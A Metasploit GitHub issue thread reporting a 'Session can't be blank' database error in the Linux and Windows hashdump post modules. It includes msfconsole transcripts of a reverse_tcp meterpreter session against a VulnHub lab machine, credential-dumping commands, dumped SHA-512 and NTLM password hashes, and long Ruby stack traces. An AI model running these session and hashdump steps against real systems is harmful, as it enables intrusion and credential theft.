Open polluxtroy3758 opened 4 years ago
This bug is triggered by receiving a session before connecting to the database, as the database does not recognize the session.
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > db_connect msf:msf@127.0.0.1/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 exploit(multi/handler) >
[*] Sending stage (3021284 bytes) to 172.16.191.219
[*] Meterpreter session 1 opened (172.16.191.165:1337 -> 172.16.191.219:35876) at 2020-03-19 11:11:43 -0400
msf5 exploit(multi/handler) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
msf5 exploit(multi/handler) > use post/linux/gather/hashdump
msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > run
[+] root:$6$kipdExP613ycWou9$hEfzDzscbvosyHZvTYneo3qo49VOQPQvDeXsy2WHpVzv1GRyYxylgTzvphXdFg554asOM9Q2q7qEGsaT4MnEq/:0:0:root:/root:/bin/bash
[+] moss:$6$ZKX2L7fJTvFO2Ved$qrJBD8SErjEjIeT.KIqmvgENAnjTQH6mCyQMLey7aMn31uiD0szjhrq8EL6gnJkK5sHzxHEHGyJqbiwI6iUHx0:1001:1001:Maurice Moss:/home/moss:/bin/bash
[+] roy:$6$Uh0q/F52PTqJQrvA$VDzEEwsd.6PiGP44dBVDbMj10IjIrCdB0qg.e36A0cW24jSVtB3PcD6YokG57hZxLs89Fx0NvWlN63.uMaac./:1002:1002:Roy Trenneman:/home/roy:/bin/bash
[+] jen:$6$oUJMVFRFI4qds92b$FIP4hsXcnEa2sHT/NyVnxi/PeMc9Kc5r7Sd/dNGyWW.7OS6nz6OinTyPAaQf5h6oxYDNz/7Cex0Gyo5EJ9OPo0:1003:1003:Jen Barber:/home/jen:/bin/bash
[+] richmond:$6$9ezwkGRwZkwCcNVu$xSeVVsn7c6jN3DwygvTqS7BT1QNjFemNVEwb6pZNCu3V2IvjUcMULhxgZ67Y/KfVSpfvoWi5Q/6fTMP9nRLty1:1004:1004:Richmond Avenal:/home/richmond:/bin/bash
[+] douglas:$6$XyRmT1iTa7FHKynm$qYVWeN85.Yaj7IpMrt0flV221BCj5WhZeCBsqryZo/DgoP/GEyekTZ6s.Q.N3lJfaiwnT5SxlWxm6m59Lg4d91:1005:1005:Douglas Reynholm:/home/douglas:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20200319111156_default_172.16.191.219_linux.hashes_205721.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > sessions -K
[*] Killing all sessions...
[*] 172.16.191.219 - Meterpreter session 1 closed.
msf5 post(linux/gather/hashdump) > db_disconnect
Successfully disconnected from the data service: local_db_service.
msf5 post(linux/gather/hashdump) > creds
[-] Database not connected
msf5 post(linux/gather/hashdump) >
[*] Sending stage (3021284 bytes) to 172.16.191.219
[*] Meterpreter session 2 opened (172.16.191.165:1337 -> 172.16.191.219:35878) at 2020-03-19 11:12:38 -0400
msf5 post(linux/gather/hashdump) > db_connect msf:msf@127.0.0.1/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 post(linux/gather/hashdump) > set session 2
session => 2
msf5 post(linux/gather/hashdump) > run
[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank
[-] Call stack:
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/validations.rb:79:in `raise_record_invalid'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/validations.rb:43:in `save!'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/attribute_methods/dirty.rb:29:in `save!'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:291:in `block in save!'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:351:in `block in with_transaction_returning_status'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `block in transaction'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/transaction.rb:184:in `within_new_transaction'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `transaction'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:220:in `transaction'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:348:in `with_transaction_returning_status'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:291:in `save!'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/persistence.rb:51:in `create!'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:151:in `block in create!'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:302:in `scoping'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:151:in `create!'
[-] /var/lib/gems/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:159:in `first_or_create!'
[-] /var/lib/gems/2.5.0/gems/metasploit-credential-3.0.4/lib/metasploit/credential/creation.rb:448:in `block in create_credential_origin_session'
[-] /var/lib/gems/2.5.0/gems/metasploit-credential-3.0.4/lib/metasploit/credential/creation.rb:623:in `retry_transaction'
[-] /var/lib/gems/2.5.0/gems/metasploit-credential-3.0.4/lib/metasploit/credential/creation.rb:447:in `create_credential_origin_session'
[-] /var/lib/gems/2.5.0/gems/metasploit-credential-3.0.4/lib/metasploit/credential/creation.rb:360:in `create_credential_origin'
[-] /var/lib/gems/2.5.0/gems/metasploit-credential-3.0.4/lib/metasploit/credential/creation.rb:119:in `create_credential'
[-] /root/Desktop/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:6:in `block in create_credential'
[-] /root/Desktop/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:166:in `data_service_operation'
[-] /root/Desktop/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:5:in `create_credential'
[-] /root/Desktop/metasploit-framework/lib/msf/core/auxiliary/report.rb:36:in `create_credential'
[-] /root/Desktop/metasploit-framework/modules/post/linux/gather/hashdump.rb:69:in `block in run'
[-] /root/Desktop/metasploit-framework/modules/post/linux/gather/hashdump.rb:51:in `each_line'
[-] /root/Desktop/metasploit-framework/modules/post/linux/gather/hashdump.rb:51:in `run'
[*] Post module execution completed
msf5 post(linux/gather/hashdump) >
This issue may be related to #10129. The second part of the issue was never resolved.
That is, the Validation failed: Session can't be blank. See log for more details.
error is still thrown if the database is connected after receiving a session.
Thanks @bcoles. @adfoster-r7 looks like another good place to implement more intuitive error-handling along with some info on what to do next!
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
for me it is not db related (the db was connected when the session opened) It happens especially on hashdump
msf6 post(windows/gather/smart_hashdump) > run
[*] Running module against ...
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
...
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY ......
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...
[+] Administrator:500:...:...:::
[-] Error: ActiveRecord::RecordInvalid Validation failed: Session can't be blank /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/validations.rb:80:in `raise_validation_error'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/validations.rb:52:in `save!'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/transactions.rb:315:in `block in save!'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/transactions.rb:387:in `block in with_transaction_returning_status'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/connection_adapters/abstract/database_statements.rb:267:in `block in transaction'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/connection_adapters/abstract/transaction.rb:239:in `block in within_new_transaction'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/connection_adapters/abstract/transaction.rb:236:in `synchronize'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/connection_adapters/abstract/transaction.rb:236:in `within_new_transaction'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/connection_adapters/abstract/database_statements.rb:267:in `transaction'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/transactions.rb:212:in `transaction'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/transactions.rb:385:in `with_transaction_returning_status'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/transactions.rb:315:in `save!'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/suppressor.rb:48:in `save!'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/persistence.rb:53:in `create!'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/relation.rb:99:in `block in create!'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/relation.rb:281:in `scoping'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/relation.rb:99:in `create!'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.5/lib/active_record/relation.rb:108:in `first_or_create!'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/metasploit-credential-4.0.3/lib/metasploit/credential/creation.rb:448:in `block in create_credential_origin_session'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/metasploit-credential-4.0.3/lib/metasploit/credential/creation.rb:623:in `retry_transaction'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/metasploit-credential-4.0.3/lib/metasploit/credential/creation.rb:447:in `create_credential_origin_session'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/metasploit-credential-4.0.3/lib/metasploit/credential/creation.rb:360:in `create_credential_origin'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/metasploit-credential-4.0.3/lib/metasploit/credential/creation.rb:119:in `create_credential'
/usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:6:in `block in create_credential'
/usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:164:in `data_service_operation'
/usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:5:in `create_credential'
/usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:39:in `create_credential'
/usr/share/metasploit-framework/modules/post/windows/gather/smart_hashdump.rb:274:in `block in read_hashdump'
/usr/share/metasploit-framework/modules/post/windows/gather/smart_hashdump.rb:246:in `each'
/usr/share/metasploit-framework/modules/post/windows/gather/smart_hashdump.rb:246:in `read_hashdump'
/usr/share/metasploit-framework/modules/post/windows/gather/smart_hashdump.rb:440:in `smart_hash_dump'
/usr/share/metasploit-framework/modules/post/windows/gather/smart_hashdump.rb:55:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/post.rb:112:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/base/simple/post.rb:82:in `run_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/post.rb:91:in `run_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/post.rb:85:in `cmd_run'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:542:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:491:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:485:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:485:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:157:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
sessions -1
[*] Starting interaction with ......
meterpreter > hashdump
Administrator:500:...:...:::
[-] Error running command hashdump: NoMethodError undefined method `id' for nil:NilClass
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
I also have this error seemingly at random. Everything is x64. (meterpreter is x64, process injected is x64, OS is Winx64. Version is (metasploit v6.2.22-dev) on Kali 2022.3
Sometimes I can dump the hashes, sometimes only the first 2 come in and I get that error.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:::
[-] Error running command hashdump: NoMethodError undefined method `id' for nil:NilClass
Here are more errors running the script the longer way:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY e8764ef63a8864b8326f31fae6b3ad34...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
Dark:"Please don't use this password ever"
[*] Dumping password hashes...
[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank
[-] Call stack:
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/validations.rb:80:in `raise_validation_error'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/validations.rb:53:in `save!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/transactions.rb:302:in `block in save!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/transactions.rb:354:in `block in with_transaction_returning_status'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/connection_adapters/abstract/database_statements.rb:320:in `block in transaction'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/connection_adapters/abstract/transaction.rb:319:in `block in within_new_transaction'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.7/lib/active_support/concurrency/load_interlock_aware_monitor.rb:26:in `block (2 levels) in synchronize'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.7/lib/active_support/concurrency/load_interlock_aware_monitor.rb:25:in `handle_interrupt'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.7/lib/active_support/concurrency/load_interlock_aware_monitor.rb:25:in `block in synchronize'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.7/lib/active_support/concurrency/load_interlock_aware_monitor.rb:21:in `handle_interrupt'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.7/lib/active_support/concurrency/load_interlock_aware_monitor.rb:21:in `synchronize'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/connection_adapters/abstract/transaction.rb:317:in `within_new_transaction'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/connection_adapters/abstract/database_statements.rb:320:in `transaction'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/transactions.rb:350:in `with_transaction_returning_status'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/transactions.rb:302:in `save!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/suppressor.rb:48:in `save!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/persistence.rb:55:in `create!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/relation.rb:799:in `_create!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/relation.rb:114:in `block in create!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/relation.rb:406:in `block in scoping'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/relation.rb:804:in `_scoping'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/relation.rb:406:in `scoping'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/relation.rb:114:in `create!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activerecord-6.1.7/lib/active_record/relation.rb:123:in `first_or_create!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/metasploit-credential-5.0.9/lib/metasploit/credential/creation.rb:448:in `block in create_credential_origin_session'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/metasploit-credential-5.0.9/lib/metasploit/credential/creation.rb:623:in `retry_transaction'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/metasploit-credential-5.0.9/lib/metasploit/credential/creation.rb:447:in `create_credential_origin_session'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/metasploit-credential-5.0.9/lib/metasploit/credential/creation.rb:360:in `create_credential_origin'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/metasploit-credential-5.0.9/lib/metasploit/credential/creation.rb:119:in `create_credential'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:6:in `block in create_credential'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:164:in `data_service_operation'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:5:in `create_credential'
[-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:39:in `create_credential'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:101:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:93:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:93:in `run'
meterpreter >
I had the same problem. I could "bypass" this error disconnecting the database with "db_disconnect", but this doest not seem to be a solution.
I had the same problem. I could "bypass" this error disconnecting the database with "db_disconnect", but this doest not seem to be a solution.
Thanks for this
Steps to reproduce
Open a root meterpreter session with an ELF
linux/x64/meterpreter/reverse_tcp
on a Debian 10.1 x64 target (Five86-1 from VulnHub).Attempt to use
post/linux/gather/hashdump
which failedExpected behavior
It should dump hashes from target, and loot them in database.
Current behavior
System stuff
Metasploit version
Framework: 5.0.72-dev
Console : 5.0.72-dev
I installed Metasploit with:
OS
Kali 2020.1
fresh install